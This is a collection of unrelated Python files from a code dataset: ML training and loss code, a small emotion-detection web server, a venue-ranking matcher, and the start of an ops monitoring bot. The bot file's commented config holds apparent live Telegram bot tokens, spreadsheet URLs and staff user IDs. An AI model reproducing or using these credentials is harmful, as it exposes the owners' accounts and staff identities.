drawer.penup()\n drawer.left(90)\n drawer.backward(200)\n drawer.pendown()\n tree(100,drawer)\n\ndef tree(length,d):\n \"\"\"\n number,turtle --> drawing\n Description: this is where the drawing takes place\n Preconditions: length has to be positive\n \"\"\"\n if length == 10:\n d.color (random_colour())\n d.forward(length)\n d.left(22.5)\n tree(length-10,d)\n d.color (random_colour())\n d.right(45)\n tree(length-10,d)\n d.color (random_colour())\n d.left(22.5)\n d.backward(length)\n if length > 10:\n d.color (\"black\")\n d.forward(length)\n d.left(22.5)\n tree(length-10,d)\n d.right(45)\n tree(length-10,d)\n d.left(22.5)\n d.backward(length)\n\ndef random_colour ():\n \"\"\"\n nothing --> color\n Description: this is where a random color is generation\n Preconditions: none\n \"\"\"\n colour = [\"yellow\",\"turquoise\",\"red\",\"orange\", \"blue\", \"magenta\", \"green\"]\n return random.choice(colour)\n \n\n###################################################################\n# Question 11\n###################################################################\n\ndef alogical (n):\n \"\"\"\n number --> number\n Description: takes a number and sees how many times 2 can be divided from it until the resultant is less than or equal to 1\n Preconditions: must be a number 1 or greater\n \"\"\"\n x = math.ceil(math.log(n,2))\n print(x)\n\n###################################################################\n# Question 12\n###################################################################\n\ndef time_format (h,m):\n \"\"\"\n number,number --> string\n Description: takes hour and minute as input and puts it into a descriptive string\n Preconditions: h is between 0 and 23 and m is between 0 and 59\n \"\"\"\n m = int(round(m/5)*5)\n if (m == 0):\n return str(h)+ \" o'clock\"\n elif (m == 60 and h == 23):\n return \"0 o'clock\"\n elif (m == 60):\n return str(h+1) + \" o'clock\"\n elif (m == 30):\n return \"half past \" +str(h)+ \" o'clock\"\n elif (m < 30):\n return str(m) + \" minutes past \" +str(h)+ \" o'clock\"\n elif(h==23):\n return str(60-m) + \" minutes to \" +str(0)+ \" o'clock\"\n else:\n return str(60-m) + \" minutes to \" +str(h+1)+ \" o'clock\"\n\n###################################################################\n# Question 13\n###################################################################\n\ndef cad_cashier (price, payment):\n p1 = (round(price/0.05)*0.05)*100\n p2 = (round(payment/0.05)*0.05)*100\n change=round(p2-p1)/100\n return(change)\n \n###################################################################\n# Question 14\n###################################################################\n\ndef min_CAD_coins (price, payment):\n \"\"\"\n number,number --> number\n Description: uses cad_cashier to find change and determines minimum number of coins needed to make transactions\n Preconditions: price and payment must both be positive and have only two decimal places\n \"\"\"\n change = cad_cashier (price,payment) * 100\n #print(change)\n t = (int(change/200))\n #print (change/200)\n lo = (int((change - t*200)/100))\n #print (change - t*200)\n q = (int((change - t*200 - lo*100)/25))\n #print (change - t*200 - lo*100)\n d = (int((change - t*200 - lo*100 - q*25)/10))\n #print (change - t*200 - lo*100 - q*10)\n n = (int((change - t*200 - lo*100 - q*25 - d*10)/5))\n # print ((change - t*200 - lo*100 - q*25 - d*10)/5)\n # print (t)\n # print (lo)\n # print (q)\n # print (d)\n # print (n)\n return (t,lo,q,d,n)\n \n \n \n\n\n \n\n","sub_path":"Assignments/A1_300069290/a1_300069290.py","file_name":"a1_300069290.py","file_ext":"py","file_size_in_byte":8768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"438197219","text":"\n\nclass Tree:\n def __init__(self, size, parent=0):\n self.size = size\n self.parent = parent\n\n\ndef make_set(x):\n x.parent = x\n\n\ndef union(x, y):\n x_root = find(x)\n y_root = find(y)\n if x_root != y_root:\n y_root.parent = x_root\n x_root.size = x_root.size + y_root.size\n\n return x_root.size\n\n\ndef find(x):\n\n if x.parent == x:\n return x\n else:\n x.parent = find(x.parent)\n return x.parent\n\n\nn, e, d = map(int, input().split())\n\nforest = [Tree(x) for x in range(n)]\n\nfor tree in forest:\n make_set(tree)\n\n# print(forest)\n\nfor __ in range(e):\n i, j = map(int, input().split())\n i -= 1\n j -= 1\n\n union(forest[i], forest[j])\n\n\nfor __ in range(d):\n i, j = map(int, input().split())\n i -= 1\n j -= 1\n\n if forest[i].parent == forest[j].parent:\n print(0)\n exit()\n\nprint(1)\n\n\n\n","sub_path":"stepik_algorithm_data_structs/2_3_4_links.py","file_name":"2_3_4_links.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"605188086","text":"import torch\nfrom torch.nn import functional\nfrom torch.autograd import Variable\n\n\n### Softmax on predicted words in the batch:\n # - The actuals (A) have the shape (batch_size, true classes) (Note: batch_size = no of sentences, true_class = vocabulary )\n # - The predicted (P) words (classes) have the shape (batch_size, max_lenght_in_batch, vocab size). [By max_length_in_batch I mean the length corresponding to the largest sentence in the bacth]\n # - P is now unrolled to have the shape (batch_size*max_length_in_batch, vocab_size)\n # - The indicator function is now applied. (It extracts the loss corresponding to the true label and rejects all the other loss.) Hence, P is now reduced to the size, (batch_size*max_length_in_batch, 1)\n # - P is now reshaped and converted back to the generic shape. (batch_size, max_length_in_batch)\n # - We know that every sentence in the batch doesn't have a length equal to max_length. Hence, the losses for words > (max_length of that particular sentence) are replaced with zeros.\n # - Finally, loss = (P[i,:].sum()/length).sum() for i in batch_size\n\ndef sequence_mask(sequence_length, max_len=None):\n if max_len is None:\n max_len = sequence_length.data.max()\n batch_size = sequence_length.size(0)\n seq_range = torch.range(0, max_len - 1).long()\n seq_range_expand = seq_range.unsqueeze(0).expand(batch_size, max_len)\n seq_range_expand = Variable(seq_range_expand)\n if sequence_length.is_cuda:\n seq_range_expand = seq_range_expand.cuda()\n seq_length_expand = (sequence_length.unsqueeze(1)\n .expand_as(seq_range_expand))\n return seq_range_expand < seq_length_expand\n\n\ndef masked_cross_entropy(logits, target, length):\n length = Variable(torch.LongTensor(length)).cuda()\n\n \"\"\"\n Args:\n logits: A Variable containing a FloatTensor of size\n (batch, max_len, num_classes) which contains the\n unnormalized probability for each class.\n target: A Variable containing a LongTensor of size\n (batch, max_len) which contains the index of the true\n class for each corresponding step.\n length: A Variable containing a LongTensor of size (batch,)\n which contains the length of each data in a batch.\n Returns:\n loss: An average loss value masked by the length.\n \"\"\"\n\n # logits_flat: (batch * max_len, num_classes)\n logits_flat = logits.view(-1, logits.size(-1))\n # log_probs_flat: (batch * max_len, num_classes)\n log_probs_flat = functional.log_softmax(logits_flat)\n # target_flat: (batch * max_len, 1)\n target_flat = target.view(-1, 1)\n # losses_flat: (batch * max_len, 1)\n losses_flat = -torch.gather(log_probs_flat, dim=1, index=target_flat)\n # losses: (batch, max_len)\n losses = losses_flat.view(*target.size())\n # mask: (batch, max_len)\n mask = sequence_mask(sequence_length=length, max_len=target.size(1))\n losses = losses * mask.float()\n loss = losses.sum() / length.float().sum()\n return loss","sub_path":"Trials/model_1/masked_cross_entropy.py","file_name":"masked_cross_entropy.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"102620574","text":"from publisher.service import PublisherService\nfrom libs.services import LazyServiceWrapper\n\nMESSAGES_COUNT = 50\nMESSAGES_TIMEOUT = 5\nMESSAGES_TIMEOUT_SHORT = 2\n\nbackend = LazyServiceWrapper(\n backend_base=PublisherService,\n backend_path='publisher.service.PublisherService',\n options={}\n)\nbackend.expose(locals())\n","sub_path":"polyaxon/publisher/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"413315745","text":"import os\nimport cv2\nimport time\nimport random\nimport traceback\nimport numpy as np\nimport tensorflow as tf\nfrom utils.visualize import image_with_cv2 as vic\nfrom utils.image import data_aug\nfrom utils.data.tfrecords import parse_function\nfrom utils.model import save_model\n\nFLAGS = tf.flags.FLAGS\ntf.flags.DEFINE_string('model_dir', '../model/', 'Directory of model checkpoint file')\ntf.flags.DEFINE_string('model_name', 'p2c', 'Name of the checkpoint file, excluding \\'.ckpt\\'')\ntf.flags.DEFINE_string('train_dir', '../train/', 'Directory to save training log file')\ntf.flags.DEFINE_integer('batch_size', 1, 'Batch size of each iteration')\ntf.flags.DEFINE_integer('epoch_num', 1, 'Total epoch number')\ntf.flags.DEFINE_float('learning_rate', 0.0001, 'Initial learning rate')\ntf.flags.DEFINE_bool('continue_training', False, 'Continue training or not')\ntf.flags.DEFINE_string('run_name', '', 'Name of this run')\ntf.flags.DEFINE_integer('save_step', 100, 'Number of steps to save model once')\ntf.flags.DEFINE_integer('sample_step', 100, 'Numbers of steps to take sample')\ntf.flags.DEFINE_bool('debug_mode', False, 'Is debugging or not')\ntf.flags.DEFINE_integer('temp_step', 0, 'The fake global step')\ntf.flags.DEFINE_float('val_ratio', 0, 'Validation ratio')\n\n\ndef save_sample(sample_image, sample_filename, run_dir, x, y, z, comparison_coordinates: list = None,\n label: bool = False):\n o_0 = cv2.applyColorMap(sample_image, cv2.COLORMAP_BONE)\n o_0 = vic.image_with_skeleton(o_0, [x, y, z])\n if label:\n o_0 = cv2.putText(o_0, 'Prediction', (0, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0))\n if comparison_coordinates is not None:\n o_O = cv2.applyColorMap(sample_image, cv2.COLORMAP_BONE)\n o_O = vic.image_with_skeleton(o_O, comparison_coordinates)\n if label:\n o_O = cv2.putText(o_O, 'Ground Truth', (0, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0))\n final_image = np.hstack((o_O, o_0))\n else:\n final_image = o_0\n\n new_filename = sample_filename.split('/')[-2] + '_' + sample_filename.split('/')[-1]\n\n comparison_filename = os.path.join(run_dir, '{}'.format(new_filename))\n cv2.imwrite(comparison_filename, final_image)\n print('Saving sample to {}'.format(comparison_filename))\n\n\ndef display_flags():\n dict = tf.flags.FLAGS.flag_values_dict()\n print('Training Parameters: ')\n for k in dict:\n print('\\t{} \\t= \\t{}'.format(k, dict[k]))\n\n\ndef display_coordinate_comparison(item_coordinates: list, x_: list, y_: list, z_: list):\n print('x: [', end='')\n for i in range(16):\n print('%.4f' % item_coordinates[0][i], end=' ')\n print(']')\n print('x_: [', end='')\n for i in range(16):\n print('%.4f' % x_[0][i], end=' ')\n print(']')\n print('y: [', end='')\n for i in range(16):\n print('%.4f' % item_coordinates[1][i], end=' ')\n print(']')\n print('y_: [', end='')\n for i in range(16):\n print('%.4f' % y_[0][i], end=' ')\n print(']')\n print('z: [', end='')\n for i in range(16):\n print('%.4f' % item_coordinates[2][i], end=' ')\n print(']')\n print('z_: [', end='')\n for i in range(16):\n print('%.4f' % z_[0][i], end=' ')\n print(']')\n\n\ndef main(_):\n MODEL_NAME = FLAGS.model_name\n MODEL_DIR = FLAGS.model_dir\n MODEL_PATH = os.path.join(MODEL_DIR, MODEL_NAME) + '.ckpt'\n if FLAGS.run_name == '':\n run_name = 'run_{}'.format(time.time().__int__())\n else:\n run_name = FLAGS.run_name\n RUN_DIR = os.path.join(FLAGS.train_dir, run_name)\n BATCH_SIZE = FLAGS.batch_size\n EPOCH_NUM = FLAGS.epoch_num\n LEARNING_RATE = FLAGS.learning_rate\n SAVE_STEP = FLAGS.save_step\n SAMPLE_STEP = FLAGS.sample_step\n DEBUG_MODE = FLAGS.debug_mode\n TEMP_STEP = FLAGS.temp_step\n VAL_RATIO = FLAGS.val_ratio\n\n display_flags()\n\n # Now let's train it!\n # with tf_debug.LocalCLIDebugWrapperSession(tf.Session()) as session:\n with tf.Session() as session:\n saver = tf.train.import_meta_graph(MODEL_PATH + '.meta')\n graph = tf.get_default_graph()\n\n train_writer = tf.summary.FileWriter(os.path.join(RUN_DIR, 'train/'), session.graph)\n val_writer = tf.summary.FileWriter(os.path.join(RUN_DIR, 'val/'), session.graph)\n\n image_input = graph.get_tensor_by_name('image_input:0')\n x_ground_truth = graph.get_tensor_by_name('x_ground_truth:0')\n y_ground_truth = graph.get_tensor_by_name('y_ground_truth:0')\n z_ground_truth = graph.get_tensor_by_name('z_ground_truth:0')\n x_prediction = graph.get_tensor_by_name('x_prediction:0')\n y_prediction = graph.get_tensor_by_name('y_prediction:0')\n z_prediction = graph.get_tensor_by_name('z_prediction:0')\n x_loss = graph.get_tensor_by_name('x_loss:0')\n y_loss = graph.get_tensor_by_name('y_loss:0')\n z_loss = graph.get_tensor_by_name('z_loss:0')\n loss = graph.get_tensor_by_name('loss:0')\n heatmaps = graph.get_tensor_by_name('heatmaps:0')\n global_step = tf.train.get_global_step()\n train = tf.train.AdamOptimizer(learning_rate=LEARNING_RATE,\n name=\"Adam{}\".format(time.time().__int__())).minimize(loss,\n global_step=global_step)\n\n session.run(tf.global_variables_initializer())\n\n tf.summary.scalar('Loss', loss)\n tf.summary.scalar('x Loss', x_loss)\n tf.summary.scalar('y Loss', y_loss)\n tf.summary.scalar('z Loss', z_loss)\n merged = tf.summary.merge_all()\n\n try:\n try:\n saver.restore(session, MODEL_PATH)\n global_step_ = session.run(global_step)\n print('Model loaded. Starting training. Global step = {}'.format(global_step_))\n\n start_time = time.time()\n current_time = start_time\n\n for i in range(1, EPOCH_NUM + 1):\n iteration_num = 0\n for j in range(1, 51):\n\n dataset = tf.data.TFRecordDataset('../data/train{}.tfrecord'.format(j))\n # shuffle_dataset = dataset.shuffle(buffer_size=400000)\n shuffle_dataset = dataset\n new_dataset = shuffle_dataset.map(parse_function)\n # repeat_dataset = new_dataset.repeat()\n batch_dataset = new_dataset.batch(BATCH_SIZE)\n iterator = batch_dataset.make_one_shot_iterator()\n next_element = iterator.get_next()\n\n while True:\n try:\n example = session.run(next_element)\n except tf.errors.OutOfRangeError:\n print('TFRecord file # {} ended.'.format(j))\n break\n else:\n example_images, example_xs, example_ys, example_zs = data_aug.random_crop(\n example['image'], example['xs'], example['ys'], example['zs'], 0.8, 0.05, 0.95)\n example_images, example_xs, example_ys, example_zs = data_aug.adjust_depth(\n example_images, example_xs, example_ys, example_zs, 10)\n # skeleton = vic.image_with_skeleton(\n # cv2.applyColorMap(example_images[0], cv2.COLORMAP_BONE),\n # [example_xs[0], example_ys[0], example_zs[0]])\n # cv2.imshow('test', skeleton)\n # cv2.waitKey(1000)\n\n iteration_num += 1\n random_num = random.random()\n if random_num > VAL_RATIO:\n\n [_, loss_, x_loss_, y_loss_, z_loss_, merged_] = session.run(\n [train, loss, x_loss, y_loss, z_loss, merged],\n feed_dict={\n image_input: example_images,\n x_ground_truth: example_xs,\n y_ground_truth: example_ys,\n z_ground_truth: example_zs\n })\n train_writer.add_summary(merged_, iteration_num)\n\n temp_time = time.time()\n period = temp_time - current_time\n current_time = temp_time\n print(\n 'Epoch {}, TFR File {}, Iteration {}, Loss = (x) {} \\t+ (y) {} \\t+(z) {} = {}. Time spent = {}'.format(\n i, j, iteration_num, x_loss_, y_loss_, z_loss_, loss_, period))\n else:\n [loss_, x_loss_, y_loss_, z_loss_, merged_] = session.run(\n [loss, x_loss, y_loss, z_loss, merged],\n feed_dict={\n image_input: example_images,\n x_ground_truth: example_xs,\n y_ground_truth: example_ys,\n z_ground_truth: example_zs\n })\n val_writer.add_summary(merged_, iteration_num)\n\n temp_time = time.time()\n period = temp_time - current_time\n current_time = temp_time\n\n print('Validation: Loss = (x) {} \\t+ (y) {} \\t+(z) {} = {}. Time spent = {}'.format(\n x_loss_, y_loss_, z_loss_, loss_, period))\n\n if iteration_num % SAMPLE_STEP == 0:\n sample_num = int(random.random() * example_xs.shape[0])\n sample_filename = example['filename'][sample_num]\n sample_filename = sample_filename.decode()\n sample_image = example_images[sample_num]\n sample_xs = example_xs[sample_num]\n sample_ys = example_ys[sample_num]\n sample_zs = example_zs[sample_num]\n\n [heatmaps_, x_, y_, z_] = session.run(\n [heatmaps, x_prediction, y_prediction, z_prediction],\n feed_dict={\n image_input: [sample_image],\n x_ground_truth: [sample_xs],\n y_ground_truth: [sample_ys],\n z_ground_truth: [sample_zs]\n })\n\n current_time = time.time()\n if DEBUG_MODE:\n display_coordinate_comparison([sample_xs, sample_ys, sample_zs], x_, y_, z_)\n\n sample_image = np.reshape(sample_image, (192, 256))\n save_sample(sample_image, sample_filename, RUN_DIR, x_[0], y_[0], z_[0],\n [sample_xs, sample_ys, sample_zs])\n\n if iteration_num % SAVE_STEP == 0:\n save_model(saver, session, MODEL_PATH)\n\n except Exception as e:\n print('Exception caught.')\n print(e.__repr__())\n traceback.print_exc()\n finally:\n train_writer.close()\n val_writer.close()\n selection = input('Save model? (y/n)')\n if selection == 'y':\n print('Saving model to ', MODEL_PATH)\n saver.save(session, MODEL_PATH)\n except FileNotFoundError:\n print('Model not found. Please create a checkpoint file first.')\n\n\nif __name__ == '__main__':\n tf.app.run(main)\n","sub_path":"src/train_p2c.py","file_name":"train_p2c.py","file_ext":"py","file_size_in_byte":12601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"121683656","text":"from itertools import zip_longest\n\nimport torch\nimport torch.nn as nn\n\nfrom .istft import InverseSTFT\n\n\nclass ConvGLU(nn.Module):\n def __init__(self, in_ch, out_ch, kernel_size=(7, 7), padding=None, batchnorm=False):\n super().__init__()\n if not padding:\n padding = (kernel_size[0] // 2, kernel_size[1] // 2)\n self.conv = nn.Conv2d(in_ch, out_ch * 2, kernel_size, padding=padding)\n if batchnorm:\n self.conv = nn.Sequential(\n self.conv,\n nn.BatchNorm2d(out_ch * 2)\n )\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n x = self.conv(x)\n ch = x.shape[1]\n x = x[:, :ch//2, ...] * self.sigmoid(x[:, ch//2:, ...])\n return x\n\n\nclass DeGLI_DNN(nn.Module):\n def __init__(self):\n super().__init__()\n self.convglu_first = ConvGLU(6, 16, kernel_size=(11, 11), batchnorm=True)\n self.two_convglus = nn.Sequential(\n ConvGLU(16, 16, batchnorm=True),\n ConvGLU(16, 16)\n )\n self.convglu_last = ConvGLU(16, 16)\n self.conv = nn.Conv2d(16, 2, kernel_size=(7, 7), padding=(3, 3))\n\n def forward(self, x, mag_replaced, consistent):\n x = torch.cat([x, mag_replaced, consistent], dim=1)\n x = self.convglu_first(x)\n residual = x\n x = self.two_convglus(x)\n x += residual\n x = self.convglu_last(x)\n x = self.conv(x)\n return x\n\n\ndef replace_magnitude(x, mag):\n phase = torch.atan2(x[:, 1:], x[:, :1]) # imag, real\n return torch.cat([mag * torch.cos(phase), mag * torch.sin(phase)], dim=1)\n\n\nclass DeGLI(nn.Module):\n def __init__(self, n_fft: int, hop_length: int,\n depth=1, separate_dnns=True, out_all_block=False):\n super().__init__()\n self.n_fft = n_fft\n self.hop_length = hop_length\n self.depth = depth\n self.out_all_block = out_all_block\n\n self.window = nn.Parameter(torch.hann_window(n_fft), requires_grad=False)\n self.istft = InverseSTFT(n_fft, hop_length=self.hop_length, window=self.window.data)\n\n num_dnns = depth if separate_dnns else 1\n self.dnns = nn.ModuleList([DeGLI_DNN() for _ in range(num_dnns)])\n\n def stft(self, x):\n return torch.stft(x, n_fft=self.n_fft, hop_length=self.hop_length, window=self.window)\n\n def forward(self, x, mag, max_length=None, depth=0):\n if isinstance(max_length, torch.Tensor):\n max_length = max_length.item()\n if depth == 0:\n depth = self.depth\n\n in_blocks = [x]\n for i, dnn in zip_longest(range(depth), self.dnns, fillvalue=self.dnns[-1]):\n # B, 2, F, T\n mag_replaced = replace_magnitude(in_blocks[-1], mag)\n\n # B, F, T, 2\n waves = self.istft(mag_replaced.permute(0, 2, 3, 1), length=max_length)\n consistent = self.stft(waves)\n\n # B, 2, F, T\n consistent = consistent.permute(0, 3, 1, 2)\n residual = dnn(in_blocks[-1], mag_replaced, consistent)\n in_blocks.append(consistent - residual)\n\n out_blocks = in_blocks[1:] if self.out_all_block else in_blocks[-1:]\n out_blocks = torch.stack(out_blocks, dim=1)\n\n final_out = replace_magnitude(in_blocks[-1], mag)\n\n return out_blocks, final_out, residual\n","sub_path":"model/degli.py","file_name":"degli.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"312744050","text":"from __future__ import unicode_literals\nfrom bottle import Bottle, request, response, BaseRequest\nimport cv2\nfrom fer import FER\nfrom urllib.request import urlopen\nimport numpy as np\nimport base64\n\nBaseRequest.MEMFILE_MAX = 1024 * 1024\n\napp = Bottle()\n\n\ndetector = FER(mtcnn=True)\n\n\ntemplate = \"\"\"\n\n Home\n \n

Upload a file

\n
\n
\n \n
\n \n\"\"\"\n\n\n@app.get('/')\ndef home():\n return template\n\n\n@app.post('/upload')\ndef upload():\n # A file-like object open for reading.\n req_file = request.files['file']\n file = req_file.file.read()\n image = cv2.imdecode(np.fromstring(file, np.uint8), cv2.IMREAD_COLOR)\n result = detector.detect_emotions(image)\n print(result)\n emotions = {'angry': 0, 'disgust': 0, 'fear': 0,\n 'happy': 0, 'sad': 0, 'surprise': 0, 'neutral': 0}\n if len(result) > 0:\n bounding_box = result[0][\"box\"]\n emotions = result[0][\"emotions\"]\n cv2.rectangle(\n image,\n (bounding_box[0], bounding_box[1]),\n (bounding_box[0] + bounding_box[2],\n bounding_box[1] + bounding_box[3]),\n (0, 155, 255),\n 2,\n )\n image = cv2.flip(image, 1)\n\n print(emotions)\n\n retval, buffer = cv2.imencode('.jpg', image)\n imgBase64 = base64.b64encode(buffer)\n return {\n \"img\": 'data:image/jpeg;base64, '+imgBase64.decode('utf-8'),\n \"emotions\": emotions\n }\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n # cam = cv2.VideoCapture(0)\n\n # cv2.namedWindow(\"test\")\n\n # img_counter = 0\n\n # while True:\n # ret, frame = cam.read()\n # if not ret:\n # print(\"failed to grab frame\")\n # break\n # result = detector.detect_emotions(frame)\n # if len(result) > 0:\n # bounding_box = result[0][\"box\"]\n # emotions = result[0][\"emotions\"]\n # cv2.rectangle(\n # frame,\n # (bounding_box[0], bounding_box[1]),\n # (bounding_box[0] + bounding_box[2],\n # bounding_box[1] + bounding_box[3]),\n # (0, 155, 255),\n # 2,\n # )\n # cv2.imshow(\"test\", frame)\n\n # k = cv2.waitKey(1)\n # if k % 256 == 27:\n # # ESC pressed\n # print(\"Escape hit, closing...\")\n # break\n # elif k % 256 == 32:\n # # SPACE pressed\n # img_name = \"opencv_frame_{}.png\".format(img_counter)\n # cv2.imwrite(img_name, frame)\n # print(\"{} written!\".format(img_name))\n # img_counter += 1\n\n # cam.release()\n\n # cv2.destroyAllWindows()\n","sub_path":"server/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"70602319","text":"import json\nimport re\nfrom fuzzywuzzy import fuzz\n\n\nclass RankingMatcher():\n\n def __init__(self, *args, **kwargs):\n self.rank_dict = {\"A*\": 0, \"A\": 0, \"B\": 0, \"C\": 0, \"other\": 0}\n self.fuzzy = 0\n\n def clearDict(self):\n self.rank_dict = {\"A*\": 0, \"A\": 0, \"B\": 0, \"C\": 0, \"other\": 0}\n\n def addRank(self, rank):\n if rank in self.rank_dict:\n self.rank_dict[rank] += 1\n else:\n self.rank_dict['other'] += 1\n\n def hasAcronym(self, title):\n x = re.search(\"\\(([^)]+)\\)\", title)\n if x != None:\n acronym = title[int(x.span()[0])+1:int(x.span()[1])-1]\n print(\"acronym:\", acronym)\n return(acronym)\n else:\n return None\n\n def searchAcronym(self, acronym):\n with open(\"venues.json\", \"r\") as venues:\n venue_list = json.load(venues)\n for venue in venue_list:\n if venue['acronym'] == acronym:\n self.addRank(venue['rank'])\n return venue['rank']\n\n def searchVenuesFuzzy(self, title):\n with open(\"venues.json\", \"r\") as venues:\n venue_list = json.load(venues)\n highest_match = None\n for venue in venue_list:\n if fuzz.ratio(venue['title'], title) > 65:\n highest_match = venue\n if not highest_match == None:\n print(highest_match)\n self.addRank(highest_match['rank'])\n return highest_match['rank']\n\n def searchJournalsFuzzy(self, title):\n with open(\"journals.json\", \"r\") as journals:\n journal_list = json.load(journals)\n highest_match = None\n for journal in journal_list:\n if fuzz.ratio(journal['title'], title) > 65:\n highest_match = journal\n if not highest_match == None:\n print(highest_match)\n self.addRank(highest_match['rank'])\n return highest_match['rank']\n\n def searchVenues(self, title):\n with open(\"venues.json\", \"r\") as venues:\n venue_list = json.load(venues)\n for venue in venue_list:\n if title == venue['title']:\n self.addRank(venue['rank'])\n return venue['rank']\n\n def searchJournals(self, title):\n with open(\"journals.json\", \"r\") as journals:\n journal_list = json.load(journals)\n for journal in journal_list:\n if title == journal['title']:\n self.addRank(journal['rank'])\n return journal['rank']\n\n# returns rank dict given title of venue\n def matchOne(self, title):\n match = None\n # acronym = self.hasAcronym(title)\n # if acronym != None:\n # match = self.searchAcronym(acronym)\n # if not match == None:\n # print(\"match acro\")\n # else:\n if \"journal\" in title:\n match = self.searchJournals(title)\n if not match == None:\n print(\"match journal\")\n else:\n match = self.searchVenues(title)\n if not match == None:\n print(\"match venue\")\n # if no match => fuzzy match\n if match == None:\n print(\"no match => fuzzy\")\n match = self.searchVenuesFuzzy(title)\n if not match == None:\n print(\"match fuzzy venue\")\n else:\n # match journal fuzzy vllt\n match = self.searchJournalsFuzzy(title)\n if not match == None:\n print(\"match fuzzy journal\")\n else:\n print(\"no match for real\")\n self.rank_dict['other'] += 1\n\n if not match == None:\n return match\n\n# loads titles via json\n def matchAllJson(self):\n with open(\"papers.json\", \"r\") as papers:\n paper_list = json.load(papers)\n i = 1\n for paper in paper_list:\n print(i, paper[\"title\"])\n self.matchOne(paper[\"venue\"])\n i += 1\n print(self.rank_dict)\n\n# loads titles via string array\n def matchAllString(self, title_list):\n i = 1\n for paper in title_list:\n print(i, paper)\n self.matchOne(paper)\n i += 1\n print(self.rank_dict)\n rank_dict = self.rank_dict\n self.clearDict()\n return rank_dict\n\n\nif __name__ == \"__main__\":\n matcher = RankingMatcher()\n # print(matcher.matchOne(\"Proc. ACM Symposium on Document Engineering(DocEng)\"))\n matcher.matchAllJson()\n pass\n","sub_path":"flask-bs/ranking_matcher.py","file_name":"ranking_matcher.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"327821449","text":"# -*- coding: utf-8 -*-\n'''\ndata = {'prod': {'survey_url':'https://docs.google.com/spreadsheets/d/1jZ7XEhS0IYUI6mkf_YOQefgUiYTVZYRU-93my3cZJgs/edit#gid=0',\n 'table':'cs_detection.tasks',\n 'token':'1918831254:AAExIEvOAeEUzb6Xmx2GrTb6HfwwkBJD7p4'},\n 'test': {'survey_url':'https://docs.google.com/spreadsheets/d/10dvYLkKzAW_6mJFGR2LB7Mx0WY_c_8GLtqhqen0q3hY/edit#gid=1481259803',\n 'table':'cs_detection.tasks_test',\n 'token':'1877618805:AAE_M1K6GVgCyiNnm0GEgWoZ3NFVRsaza6g'},\n 'allow_list_dict':{'CS_Millie': '233459297',\n 'CS_Carol':'1461296420',\n 'CS_Edgar':'1076025437',\n 'CS_Sally':'1139058216',\n 'CS_Doris':'1853406042',\n 'RD':'1465290152',\n 'OM':'1798791836'},\n 'googlesheetAPIJson':'C://Users//user//Desktop//project//OMBOT//aicool-csbot-0539c368976e.json'}\nwith open('config.json', 'w') as fp:\n json.dump(data, fp)\n'''\nimport threading\nimport json\nimport pygsheets\nimport os\nimport pandas as pd\nfrom urllib.request import ssl, socket\nimport mysql.connector\nfrom telnetlib import Telnet\nimport time\nimport datetime\nfrom queue import Queue\npd.set_option('max_columns', None)\npd.set_option('max_rows', 100)\ndef variable_zone(env='test'):\n with open('config.json') as json_file: \n config = json.load(json_file) \n gc = pygsheets.authorize(service_account_file=config['googlesheetAPIJson'])\n survey_url = config[env]['survey_url']\n table = config[env]['table']\n token = config[env]['token']\n \n #allow list\n allow_list_dict = config['allow_list_dict']\n allow_list = list(allow_list_dict.values()) \n sh = gc.open_by_url(survey_url)\n ws = sh.worksheet_by_title('CS維護表')\n \n return ws, table, token, allow_list\n\ndef ws_to_df(ws):\n df = ws.get_as_df(start='A1', \n index_colum=0, \n empty_value='',\n include_tailing_empty=False) # index 從 1 開始算 \n df['商戶'] = df['商戶'].apply(lambda x: str(x).upper())\n df['type'] = df['type'].apply(lambda x: str(x).upper())\n df.columns = ['商戶', 'ip', 'domain', 'MYSQL', 'TOMCAT', 'SOCKET', 'type']\n return df\n\ndef om_bot(text, df):\n def execCmd(cmd, request, q):\n def get_check(tar, remove_list=['最小值=', '最大值=', '平均=', 'ms'], spli=',',threshold=200): \n try:\n rs = tar\n for i in remove_list:\n rs = rs.replace(i, '')\n rs = [float(i) for i in rs.split(spli) ]\n if max(rs) >=200:\n icon = '❌'\n else:\n icon = '✅'\n except:\n icon = '❌'\n return icon \n cmd_raw = cmd\n cmd_ta = cmd_raw.replace('(socket)', '')\n r = os.popen(cmd_ta)\n result = r.read()\n r.close()\n if request == 'PING':\n result = result.split('\\n')[-2].replace(' ', '')\n get_ip_icon = get_check(result)\n result = (cmd_raw, ' 結果:\\n'+ result+ get_ip_icon)\n \n elif request == 'TCPING':\n result = result.split('\\n')[-2].replace(' ', '')\n get_ip_icon = get_check(result, \n remove_list=['Minimum=', 'Maximum=', 'Average=', 'ms'], \n spli=',',\n threshold=200)\n result = (cmd_raw, ' 結果:\\n'+ result+ get_ip_icon)\n q.put(result)\n \n def multithread(dx):\n q = Queue()\n all_thread = []\n for i in range(len(dx)):\n thread = threading.Thread(target=execCmd, args=(dx.cmd[i], \n dx.req[i], \n q))\n thread.start()\n all_thread.append(thread)\n for t in all_thread:\n t.join()\n # 使用 q.get() 取出要傳回的值\n result = []\n for _ in range(len(all_thread)):\n result.append(q.get())\n return result \n\n BadRequest_ans = 'request不在查詢範圍中 / 格式不對' \n seperation = '\\n-------------------------------' \n try:\n text = text.upper()\n customer, request = 